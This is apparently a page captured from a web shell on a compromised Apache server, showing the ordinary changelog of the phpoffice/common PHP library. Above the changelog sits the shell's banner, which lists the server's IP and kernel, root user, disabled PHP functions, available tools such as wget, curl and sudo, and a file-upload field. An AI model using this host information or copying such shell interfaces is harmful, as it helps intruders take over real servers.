| Server IP : 52.9.100.119 / Your IP : 216.73.216.171 Web Server : Apache/2.4.61 (Amazon) OpenSSL/1.0.2k-fips PHP/7.3.30 Phusion_Passenger/5.1.5 System : Linux ip-172-31-9-35 4.14.355-196.618.amzn1.x86_64 #1 SMP Mon Apr 7 17:09:50 UTC 2025 x86_64 User : root ( 0) PHP Version : 7.3.30 Disable Function : exec,passthru,shell_exec,system,popen,proc_open MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : OFF Directory : /data/html/garlans_live/vendor/phpoffice/common/ |
Upload File : |
# Changelog ## 0.1.0 ### Features - Initial Release ## 0.1.1 ### Features - Added String::chr for suppporting Unicode Characters ## 0.2.0 ### Changes - Renamed String class in Text class for supporting PHP7 ## 0.2.1 ### Features - Added XMLReader from PHPWord ## 0.2.2 ### BugFix - Fixed "Class 'PhpOffice\Common\ZipArchive' not found in /src/Common/XMLReader.php on line 54" ## 0.2.3 ### Features - Added missing features for supporting PHPWord ## 0.2.4 ### Changes - XMLWriter : Refactoring for improving performances ## 0.2.5 ### Features - Added Zip Adapters (PclZip & ZipArchive) ## 0.2.6 ### Changes - `\PhpOffice\Common\Text::utf8ToUnicode()` became `public`.